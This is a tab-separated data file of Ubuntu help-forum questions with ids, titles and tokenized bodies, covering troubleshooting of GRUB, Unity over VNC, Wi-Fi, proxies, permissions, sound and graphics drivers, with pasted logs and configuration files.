53258	starting unity with vnc4server on a linode vps	i 've managed to install vnc4server as well as vnc into it ( and change the annoying issue where pressing d would minimize all windows ) however when i type unity into the terminal it gives me : # unity unity-panel-service : no process found compiz ( core ) - fatal : no xkb extension backend : gconf integration : true profile : unity adding plugins initializing core options ... done window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 1 initializing bailer options ... done initializing detection options ... done compiz ( core ) - fatal : no composite extension compiz ( composite ) - error : initscreen failed compiz ( core ) - error : could n't activate plugin 'composite' compiz ( core ) - error : plugin 'composite ' not loaded . compiz ( core ) - error : initplugin 'opengl ' failed compiz ( core ) - error : could n't activate plugin 'opengl' initializing decor options ... done initializing mousepoll options ... done initializing vpswitch options ... done compiz ( core ) - error : plugin 'composite ' not loaded . compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : initplugin 'animation ' failed compiz ( core ) - error : could n't activate plugin 'animation' initializing snap options ... done compiz ( core ) - error : plugin 'composite ' not loaded . compiz ( core ) - error : initplugin 'expo ' failed compiz ( core ) - error : could n't activate plugin 'expo' initializing move options ... done compiz ( core ) - error : plugin 'composite ' not loaded . initializing place options ... done compiz ( core ) - error : plugin 'composite ' not loaded . initializing grid options ... done initializing gnomecompat options ... done compiz ( core ) - error : plugin 'composite ' not loaded . compiz ( core ) - error : initplugin 'wall ' failed compiz ( core ) - error : could n't activate plugin 'wall' compiz ( core ) - error : plugin 'composite ' not loaded . compiz ( core ) - error : initplugin 'ezoom ' failed compiz ( core ) - error : could n't activate plugin 'ezoom' compiz ( core ) - error : plugin 'composite ' not loaded . initializing workarounds options ... done compiz ( core ) - error : plugin 'composite ' not loaded . compiz ( core ) - error : initplugin 'staticswitcher ' failed compiz ( core ) - error : could n't activate plugin 'staticswitcher' initializing resize options ... done compiz ( core ) - error : plugin 'composite ' not loaded . compiz ( core ) - error : plugin 'opengl ' not loaded . compiz ( core ) - error : initplugin 'fade ' failed compiz ( core ) - error : could n't activate plugin 'fade' compiz ( core ) - error : plugin 'composite ' not loaded . compiz ( core ) - error : initplugin 'unitymtgrabhandles ' failed compiz ( core ) - error : could n't activate plugin 'unitymtgrabhandles' compiz ( core ) - error : plugin 'composite ' not loaded . compiz ( core ) - error : initplugin 'scale ' failed compiz ( core ) - error : could n't activate plugin 'scale' initializing session options ... done compiz ( core ) - error : plugin 'composite ' not loaded . compiz ( core ) - error : initplugin 'unityshell ' failed compiz ( core ) - error : could n't activate plugin 'unityshell' pcilib : can not open /proc/bus/pci lspci : can not find any working access method . pcilib : can not open /proc/bus/pci lspci : can not find any working access method . could n't find a perfect decorator match ; trying all decorators starting unity-window-decorator setting update `` run_command_terminal_key '' the program 'unity-window-decorator ' received an x window system error . this probably reflects a bug in the program . the error was 'badvalue ( integer parameter out of range for operation ) ' . ( details : serial 400 error_code 2 request_code 53 minor_code 0 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) it it possible to solve this issue on a vps ?
53261	get back geeky grub	i installed ubuntu natty but i dont like the loader . the puprle screen gets on my nerves and i miss seeing all the action from the dmesg . unfortunately i know nothing about grub and i dont know how i should configure it to get it as i want . could anyone help me ? this is what i have now : # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( /dev/sda , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 573c9e53-c333-4ed2-b61a-23678e4051c7 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=1280x1024 load_video insmod gfxterm fi terminal_output gfxterm insmod part_msdos insmod ext2 set root= ' ( /dev/sda , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 573c9e53-c333-4ed2-b61a-23678e4051c7 set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=5 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear f i # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 2.6.38-8-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod part_msdos insmod ext2 set root= ' ( /dev/sda , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 573c9e53-c333-4ed2-b61a-23678e4051c7 linux /boot/vmlinuz-2.6.38-8-generic root=uuid=573c9e53-c333-4ed2-b61a-23678e4051c7 ro vga=775 initrd /boot/initrd.img-2.6.38-8-generic } menuentry 'ubuntu , with linux 2.6.38-8-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod part_msdos insmod ext2 set root= ' ( /dev/sda , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 573c9e53-c333-4ed2-b61a-23678e4051c7 echo 'loading linux 2.6.38-8-generic ... ' linux /boot/vmlinuz-2.6.38-8-generic root=uuid=573c9e53-c333-4ed2-b61a-23678e4051c7 ro single vga=795 echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.38-8-generic } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( /dev/sda , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 573c9e53-c333-4ed2-b61a-23678e4051c7 linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( /dev/sda , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 573c9e53-c333-4ed2-b61a-23678e4051c7 linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows 7 ( loader ) ( on /dev/sda1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( /dev/sda , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 92fec09dfec07b4d chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # #
53263	shut down computer from keyboard	is there a keyboard shortcut available to shutdown the computer ? i know i can use the power button , but i would like to be able to it from the keyboard . if such a shortcut does not exist already , how do i set one ?
53264	how do you find out which program is using too much memory ?	ubuntu has been crashing on me recently . i think its because it runs out of memory so i ran the free -m command and found that my memory usage was really high . so then , i ran top to find the culprit , but the displayed processes were using less than 1.5 % of m. how do i know which program is making ubuntu crash/run out of memory ? below is the output : shafee @ shafee-pc : ~ $ free -m total used free shared buffers cached mem : 3824 3714 110 0 978 1954 -/+ buffers/cache : 780 3044 swap : 99 0 99 shafee @ shafee-pc : ~ $ top top - 02:12:14 up 1:24 , 2 users , load average : 0.16 , 0.42 , 1.49 tasks : 182 total , 1 running , 181 sleeping , 0 stopped , 0 zombie cpu ( s ) : 2.9 % us , 1.9 % sy , 0.3 % ni , 79.3 % id , 15.5 % wa , 0.0 % hi , 0.2 % si , 0.0 % st mem : 3916708k total , 3803848k used , 112860k free , 1002308k buffers swap : 102396k total , 0k used , 102396k free , 2001852k cached pid user pr ni virt res shr s % cpu % mem time+ command 4200 root 20 0 289m 53m 38m s 2 1.4 1:06.45 xorg 5590 shafee 20 0 19348 1368 956 r 2 0.0 0:00.01 top 1 root 20 0 24124 2136 1264 s 0 0.1 0:02.05 init 2 root 20 0 0 0 0 s 0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0 0.0 0:24.23 ksoftirqd/0 6 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/0 7 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/1 9 root 20 0 0 0 0 s 0 0.0 0:00.11 ksoftirqd/1 11 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/2 13 root 20 0 0 0 0 s 0 0.0 0:03.89 ksoftirqd/2 14 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/3 16 root 20 0 0 0 0 s 0 0.0 0:00.16 ksoftirqd/3 17 root 0 -20 0 0 0 s 0 0.0 0:00.00 cpuset 18 root 0 -20 0 0 0 s 0 0.0 0:00.00 khelper 19 root 0 -20 0 0 0 s 0 0.0 0:00.00 netns 21 root 20 0 0 0 0 s 0 0.0 0:00.01 sync_supers shafee @ shafee-pc : ~ $ or is it normal to have 110mb of free memory and is my issue related to something else ?
53272	system fails to start after compiling grsec kernel	recently i 've tried to compile kernel with grsec patch to increase security of my machine . compilation went even smoothly , but after running new kernel system runs until xserver starts . here 's tailed dmesg : [ 43.753694 ] [ drm : radeon_cs_ioctl ] error invalid command stream ! [ 45.917078 ] forbidden register 0x4028 in cs at 40 [ 45.917082 ] [ drm : radeon_cs_ioctl ] error invalid command stream ! [ 45.918384 ] forbidden register 0x4028 in cs at 40 [ 45.918387 ] [ drm : radeon_cs_ioctl ] error invalid command stream ! [ 45.918654 ] forbidden register 0x4028 in cs at 40 [ 45.918656 ] [ drm : radeon_cs_ioctl ] error invalid command stream ! steps which i 've compiled kernel source : 1 ) instaled needed packages for compiling kernel source 2 ) downloaded matching kernel version for grsec and unpacked to /usr/src/ 3 ) applied grsec patch 4 ) copied and loaded config of current kernel from /boot 5 ) compiled and made .deb package 6 ) installed and rebooted any advice for this problem ? i can not run xserver letting network connect to my wifi network with wpa2 .
53274	connecting to wpa2 network from console	how can i connect to a wpa2 encrypted network from the terminal/console ? i 've wanted to remove the whole x-window system and use a terminal based system only to free up any available memory and process list ( s ) , but the only way to i have to connect to my essid network right now is via the network manager . one other thing of note is that the wpa-supplicant is currently not working for my zydas usb card .
53275	setting proxy works for firefox but not the package manager	i 'm using ubuntu version 11.04 i live in a university and we have to give our proxy userid to obtain any internet access . i 've given my proxy details in system settings - > network proxy mozilla firefox works ok and i can access the internet just fine but now when i try to update it 'll ask me to authenticate . in ubuntu 10.04 when i faced this very same problem i just changed a few settings in the administration preferences along with the network proxy . although now i can not find the area for administration pref . in ubuntu 11.04 do i need to give the proxy settings in another area other than the network proxy for an update ? i 've also changed the synaptic package manger settings but an error is displayed . the error is : , w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/natty-security/main/binary-i386/packages 407 proxy authentication required , w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/natty-security/restricted/binary-i386/packages 407 proxy authentication required , e : some index files failed to download . they have been ignored , or old ones used instead . any help would be greatly appreciated . thanks !
53276	is it possible to install without a live cd ?	i am wondering if it is possible to install ubuntu without the use of a live cd . i have an issue so i wish to reinstall it now , but i currently do not have any cd 's at home .
53279	how to set xforcevesa ?	i have a oqo i 'm converting to natty . i have a screen resolution problem on the native lcd screen . i have some indication that xforcevesa will allow the system to get the proper resolution information for my machine . where do i put this ? what does the syntax look like ?
53282	grub boot menu does not properly reflect default selection using start-up manager	after a ubuntu linux core update ( 2.6.38-8 to 2.6.38-10 ) a few days ago , i noticed my os default selection in grub had changed . the previous core version was added to grub as a single option to be selected . so grub now displays the following : ubuntu , with linux 2.6.38-10-generic ubuntu , with linux 2.6.38-10-generic ( recovery mode ) previous linux versions memory test ( memtest86+ ) memory test ( memtest86+ , serial console 115200 ) microsoft windows xp professional ( on /dev/sdb1 ) if you select previous linux versions , another screen displays : ubuntu , with linux 2.6.38-8-generic ubuntu , with linux 2.6.38-8-generic ( recovery mode ) esc reverts back to the main boot screen . i used the start-up manager app in ubuntu to change the default selection back to winxp but in grub the default reverts to the first menu selection , ubuntu , with linux 2.6.38-10-generic . i checked the grub default file ( /etc/default/grub ) . the grub_default=6 setting ( including counting both previous core selections ) matches the convention of menu order selection ( i.e . starting with 0 , then 1,2.3 ... ) and the change from using start-up manager , but the grub boot screen displays the first menu selection as default . now , using start-up manager again , if you select the option just before the desired default ( in this case , memory test ( memtest86+ , serial console 115200 ) , the default reverts to winxp , the last selection . i confirmed the change was listed correctly as grub_default=5 in the grub default file . any suggestions on cleaning this up ? i have used start-up manager numerous times prior to the core update and had no problems . it 's also easier than manually editing the grub default file . note : i have no trouble loading grub and booting into any manually selected os , it 's just the default is not reflected properly in the grub boot screen when making changes from the start-up manager . [ system info : running ubuntu 11.04 dual-boot with winxp ( ubuntu on separate hard drive ) ]
53285	how can i prevent users from accessing the root directory ?	while still allowing my account to access the root directory . i 've tried adding myself to the root group with $ sudo adduser myaccount root but when i do $ sudo chmod o-r /etc followed by $ cd /etc $ dir it says permission denied . maybe i 'm thinking about the wrong solution for my problem . i setup an ssh server with openssh and want to give users the ability to navigate and edit files in a specific folder /home/myaccount/website/deveopment/ without giving them the ability to view or edit anything else . to solve that problem , i 'm attempting to disable 'other group ' read permissions from every folder in root so that only root can access them . that 's when i ran into the above problem . even after adding myself to root , i still ca n't access directories with 'other group ' read permissions disabled .
53290	formatting microsd card error	i 'm trying to format a sandisk 16gb microsd card but when i do i keep getting the following message : one or more partitions are busy on /dev/mmcblk0 how do i correct this so that i can properly format the card ? i 've tried formatting it with gparted but it never makes it past the second step .
53293	what 's the difference between unfs3 and nfs-kernel-server ?	i tried to install nfs using sudo apt-get install nfs-server ( for the purpose of streaming audio files to a mac running os 10.6 ) and discovered that i have two packages to choose between . package nfs-server is a virtual package provided by : nfs-kernel-server 1:1.2.0-4ubuntu4.1 unfs3 0.9.22+dfsg-2 you should explicitly select one to install . is there any particular reason to choose unfs3 over nfs-kernel server ? is it faster or slower ? more or less stable ? does it matter at all ? apart from the fact that i will be streaming some fairly large files ( flac ) , i will be doing nothing out of the ordinary . it 's on a closed network so there are no security concerns .
53297	how can i boot to and access my windows 7 partition or reinstall ubuntu ?	i 'm running a dual boot windows7/ubuntu box and i deleted my ubuntu partition from windows because i had a problem updating to ubuntu 11.04 . when i boot my pc , i get an `` error can not find partition '' message and get the grub rescue prompt . further , my bios wo n't detect when i attempt to boot ubuntu from usb . how can i boot to and access my windows 7 partition or reinstall ubuntu ?
53300	why do i have choppy video playback ?	i 'm facing a problem with blu-ray ( .mkv ) videos on my pc . when the video is playing sometimes it just freezes or plays quickly , but the sound goes on and later the video starts playing properly . i tried switching to different media players ( movie player , splayer , vlc player ) but the same problem occurs . also , i reconfigured the graphics card settings but i 'm easily able to play hq games . graphics card - ati radeon hd3470 pc - sony vaio fw ubuntu 11.04
53301	software removal without synaptic or dpkg for manually built software	i have a ubuntu system with a mix of softwares that were installed either by synaptic/dpkg manual built and install however , i would now like to remove those software that were manually built and installed . is there a systematic way of doing this ?
53306	htc trophy not detected	when i plug in the device via usb chord , nothing happens and the device is not shown on the desktop . however , when i type `` lsusb '' into a terminal this is the output : bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 002 : id 04f2 : b249 chicony electronics co. , ltd bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 045e:04ec microsoft corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub i 'm assuming microsoft corp. is the device but why is n't ubuntu displaying it on the desktop ?
53308	remove shutdown , suspend , restart , and hibernate from the user switcher menu	i 'm using a desktop as both a router for my local network and as a normal desktop with multiple users . i have maverick running on it . occasionally , one of the desktop users will accidentally press shutdown , restart , suspend , or hibernate , leading to me having to fix the network at random times of day . i know how to restart and shutdown from the command line . i do not need the gui interface . how can i remove the shutdown , suspend , restart , and hibernate options form the user switcher menu ? all the i want left is the `` lock screen '' , `` guest session '' , list of users and `` logout '' left . a system wide solution would be best , but i can do one on each user if necessary .
53310	is it possible to install zsnes emulator from default software sources ?	i can find it listed when i search for `` zsnes '' in the ubuntu software center but it does n't have the `` install '' button . if i click the `` more information '' button i 'll get a `` package not found '' message . synaptic ca n't find this package either . ( from user @ rej ) i have natty 64bit . when i run sudo apt-get install zsnes it gives the following output : reading package lists ... done building dependency tree reading state information ... done package zsnes is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'zsnes ' has no installation candidate
53320	sound disappeared after oss installation	i 've installed the oss backend from a deb64 package . and the sound in ubuntu is disappeared ... seems the audio card ( hda nvidia ) is not recognized anymore ... what can i do ? edit sound now works , but oss still do n't ... it seems to work not very well with ubuntu ( also if it is shown in control panel ) .
53321	how does one retheme the unity panel with gtk ?	i want to take an existing theme and customise the appearance of the unity panel to the way it appears in another theme . i ca n't find any documentation about how to modify the panel themes , and i 've tried comparing several gtkrc files for different themes that have custom panels , moving around bits of text , but i ca n't figure out how it 's done . basically , i 'm trying to put a dark panel with a gradient in the orta theme . where do i find the answer ?
53323	how do i get sound working in unreal tournament 2004 ?	i 'm playing ut2004 for linux but if i run it with plain ./ut2004 i 've no sound in it , if i run it with aoss ./ut2004 using in such way the alsa-oss library , the game often crash - i suppose - with warning : alc_ext_capture is subject to change ! i noticed the game 'require ' the openal libs.. so what package i should install ?
53327	screen is going crazy after connecting to wi-fi network	i just installed xubuntu as my primary and only os . in my opinion , its not only xubuntu , but all ubuntu family . you see , before i installed xubuntu , i had ubuntu as live cd to try it ... it end up with the same problem . problem is that after compiling firmware for wusb600n v2 , installing it and making system recognize it , rebooting ... trying to connect network ... few minutes : my monitor show something like this ... what could cause such behavior ? i just tried to connect to wi-fi network ! maybe this is because of my drivers . you see , there are no drivers ! just this one for wusb600n v2 and native linux drivers or whatever . if so , i see two options : get files for correct drivers from another computer and then ... install them on my computer . somehow turn off all fancy ( if default desktop calls as fancy ) effects and then ... try again . what do you suggest ? i 'm not so good at linux ... so i 'm just guessing . thanks in advice !
53335	what should the source be when using openvpn ?	i 'm trying to use openvpn on my ubuntu 10 vps . i 'm trying to route my traffic using this command : iptables -t nat -a postrouting -s 10.8.0.0/24 -j snat -to the error i get is : iptables v1.4.4 : you must specify -- to-source what should the source be ?
53341	complete freeze on a thinkpad t520	ubuntu 11.04 on my thinkpad t520 has been randomly freezing every since i installed it . i asked the following question a long time ago but it has n't really helped me : how do i debug when the system freezes or when it crashes back to login ? here is a complete copy paste of my xsession.errors file : http : //pastebin.com/7rbs0ebh i also tried everything in the following question : what should i do when ubuntu freezes ? i tried reisub and the other suggestions in that question but nothing seems to work . the only think that works is resetting the laptop . any help is appreciated and if i need to provide more information/logs just ask i am really motivated to fix this . update 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series chipset family mei controller # 1 ( rev 04 ) 00:16.3 serial controller : intel corporation 6 series chipset family kt controller ( rev 04 ) 00:19.0 ethernet controller : intel corporation 82579lm gigabit network connection ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 6 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 6 series chipset family pci express root port 1 ( rev b4 ) 00:1c.1 pci bridge : intel corporation 6 series chipset family pci express root port 2 ( rev b4 ) 00:1c.3 pci bridge : intel corporation 6 series chipset family pci express root port 4 ( rev b4 ) 00:1c.4 pci bridge : intel corporation 6 series chipset family pci express root port 5 ( rev b4 ) 00:1d.0 usb controller : intel corporation 6 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation 6 series chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 6 series chipset family 6 port sata ahci controller ( rev 04 ) 00:1f.3 smbus : intel corporation 6 series chipset family smbus controller ( rev 04 ) 03:00.0 network controller : intel corporation centrino ultimate-n 6300 ( rev 35 ) 0d:00.0 system peripheral : ricoh co ltd device e823 ( rev 05 ) 0d:00.3 firewire ( ieee 1394 ) : ricoh co ltd firewire host controller ( rev 04 ) bus 002 device 003 : id 0bdb:1911 ericsson business mobile networks bv bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 006 : id 04f2 : b217 chicony electronics co. , ltd bus 001 device 005 : id 0a5c:217f broadcom corp. bluetooth controller bus 001 device 004 : id 147e:2016 upek biometric touchchip/touchstrip fingerprint sensor bus 001 device 003 : id 045e:0737 microsoft corp . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
53343	how to use wifi with a samsung np n145 plus in 10.04 ?	i have installed ubuntu 10.04 and trying to access wifi but not able to . any specific procedure to be followed ?
53344	why wo n't my 1 tb usb drive appear ?	i 've been having some problems with getting an usb drive to appear . first i connected it to my ubuntu laptop and the drive appeared and i could format it with the ext file system . then i moved the drive to another computer that is also running ubuntu and the drive wo n't appear in gparted or other tools . could you recommend a way to proceed ? thanks update . here 's the output from $ dmesg | tail [ 245126.162668 ] [ drm ] nouveau 0000:01:00.0 : no space while unhiding cursor [ 245128.122950 ] [ drm ] nouveau 0000:01:00.0 : no space while unhiding cursor [ 245128.186959 ] [ drm ] nouveau 0000:01:00.0 : no space while unhiding cursor [ 245128.554783 ] [ drm ] nouveau 0000:01:00.0 : no space while unhiding cursor [ 245129.050730 ] [ drm ] nouveau 0000:01:00.0 : no space while unhiding cursor [ 245132.522971 ] [ drm ] nouveau 0000:01:00.0 : no space while unhiding cursor [ 245132.578123 ] [ drm ] nouveau 0000:01:00.0 : no space while unhiding cursor [ 245133.466497 ] [ drm ] nouveau 0000:01:00.0 : no space while unhiding cursor [ 245134.627949 ] [ drm ] nouveau 0000:01:00.0 : no space while unhiding cursor [ 245135.574092 ] [ drm ] nouveau 0000:01:00.0 : no space while hiding cursor ... [ 257116.514694 ] scsi6 : usb-storage 2-6:1.0 [ 257117.545565 ] scsi 6:0:0:0 : direct-access wd 5000aakb externa l108 p q : 0 ansi : 0 [ 257117.546254 ] sd 6:0:0:0 : attached scsi generic sg4 type 0 [ 257117.549423 ] sd 6:0:0:0 : [ sdc ] 976773168 512-byte logical blocks : ( 500 gb/465 gib ) [ 257117.550426 ] sd 6:0:0:0 : [ sdc ] write protect is off [ 257117.550430 ] sd 6:0:0:0 : [ sdc ] mode sense : 03 00 00 00 [ 257117.551416 ] sd 6:0:0:0 : [ sdc ] no caching mode page present [ 257117.551422 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through [ 257117.554039 ] sd 6:0:0:0 : [ sdc ] no caching mode page present [ 257117.554043 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through [ 257117.557055 ] sdc : sdc1 [ 257117.559543 ] sd 6:0:0:0 : [ sdc ] no caching mode page present [ 257117.559548 ] sd 6:0:0:0 : [ sdc ] assuming drive cache : write through [ 257117.559552 ] sd 6:0:0:0 : [ sdc ] attached scsi disk and new output from $ dmesg | tail ubuntu @ ubuntu : ~ $ dmesg | tail [ 128.502416 ] usbcore : registered new interface driver usblp [ 130.703847 ] hda intel 0000:00:1b.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 130.703909 ] hda intel 0000:00:1b.0 : irq 44 for msi/msi-x [ 130.703935 ] hda intel 0000:00:1b.0 : setting latency timer to 64 [ 135.755667 ] lp0 : using parport0 ( interrupt-driven ) . [ 11469.094303 ] ext4-fs ( sdc1 ) : vfs : ca n't find ext4 filesystem ubuntu @ ubuntu : ~ $
53347	emacs-like keybindings globally	i 'm trying to emulate behaviour i get from keyremap4macbook on mac os x . it lets me remap control-m to enter , for instance , globally . is this possible with x/gnome ? seems like xmodmap is not suitable for remapping key combinations . i tried xbindkeys to bind control-m to xdotool key return , but it emits control-return . i tried xdotool keyup control ; xdotool key return ; xdotool keydown control but it stills behaves unpredictably . any ideas ? kernel level hacks ?
53348	headphones do n't work correctly on an asus k50ij laptop	i have asus k50ij series laptop and runung dual os on it . on windows instalation everything works great , but then ubuntu is being used headphones and speakers works at the same time or both gets muted . i have googled for solution but found any working fixes . how to get my sound card working as it should ?
53352	how do i setup an authoritative name server with tinydns ?	i want to use tinydns to serve up dns records for my domain name . what is a minimal example of how to set this up in ubuntu ? you can assume that i 've already set the name server for the domain to point to the ip of my server .
53353	ca n't use my new logitech k750 when booting ( grub ) in ubuntu 11.04	yes , my new logitech k750 works allright when my os ( ubuntu 11.04 ) is up . but there 's only one thing : when booting and going into the grub2 bootloader , i ca n't select options by using the arrow keys , nor can i use the 'e ' for editing . especially annoying if one has a second os to choose from . does anyone has a solution for this flaw ? thanks in advance .
53354	why is /usr/lib/libgl.so.1 always linked to libgl.mesa.so ?	i use the nvidia binary drivers and therefore need those libgl* links in /usr/lib to point to /usr/lib/nvidia-current . but ubuntu insists on pointing libgl.so.1 ( not libgl.so ) to libgl.mesa.so whenever i install some opengl related packages . so far i am fine with always overwriting the wrong link . i would really like to know how i could fix that behaviour , or even where i should look for possible causes of this issue . edit : maybe i should add that i use nvidia-current from the ubuntu-x-swat ppa : /u/lib > apt-cache policy nvidia-current nvidia-current : installed : 275.09.07-0ubuntu1~lucid~xup1 candidate : 275.09.07-0ubuntu1~lucid~xup1 version table : *** 275.09.07-0ubuntu1~lucid~xup1 0 500 hxxp : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu/lucid/main packages 100 /var/lib/dpkg/status 195.36.24-0ubuntu1~10.04 0 500 hxxp : //de.archive.ubuntu.com/ubuntu/ lucid-updates/restricted packages 195.36.15-0ubuntu2 0 500 hxxp : //de.archive.ubuntu.com/ubuntu/ lucid/restricted packages i need those because my gtx 460 is not supported by the drivers in the official lucid repositories . ~ > update-alternatives -- display gl_conf gl_conf - auto mode link currently points to /usr/lib/nvidia-current/ld.so.conf /usr/lib/mesa/ld.so.conf - priority 500 slave xorg_extra_modules : /usr/lib/xorg/x11-extra-modules /usr/lib/nvidia-current/ld.so.conf - priority 9700 slave libvdpau_nvidia.so : /usr/lib/nvidia-current/vdpau/libvdpau_nvidia.so slave libvdpau_nvidia.so.1 : /usr/lib/nvidia-current/vdpau/libvdpau_nvidia.so.1 slave libvdpau_nvidia.so.1_lib32 : /usr/lib32/nvidia-current/vdpau/libvdpau_nvidia.so.1 slave libvdpau_nvidia.so_lib32 : /usr/lib32/nvidia-current/vdpau/libvdpau_nvidia.so slave man_nvidiaxconfig.gz : /usr/share/man/man1/alt-nvidia-current-xconfig.1.gz slave nvidia-autostart.desktop : /usr/share/nvidia-current/nvidia-autostart.desktop slave nvidia-smi.1.gz : /usr/share/man/man1/alt-nvidia-current-smi.1.gz slave nvidia_bug_report : /usr/lib/nvidia-current/bin/nvidia-bug-report.sh slave nvidia_desktop : /usr/share/nvidia-current/ubuntu-nvidia-settings.desktop slave nvidia_drv : /usr/lib/nvidia-current/xorg/nvidia_drv.so slave nvidia_modconf : /lib/nvidia-current/modprobe.conf slave nvidia_smi : /usr/lib/nvidia-current/bin/nvidia-smi slave nvidia_xconfig : /usr/lib/nvidia-current/bin/nvidia-xconfig slave xorg_extra_modules : /usr/lib/nvidia-current/xorg slave xvmcconfig : 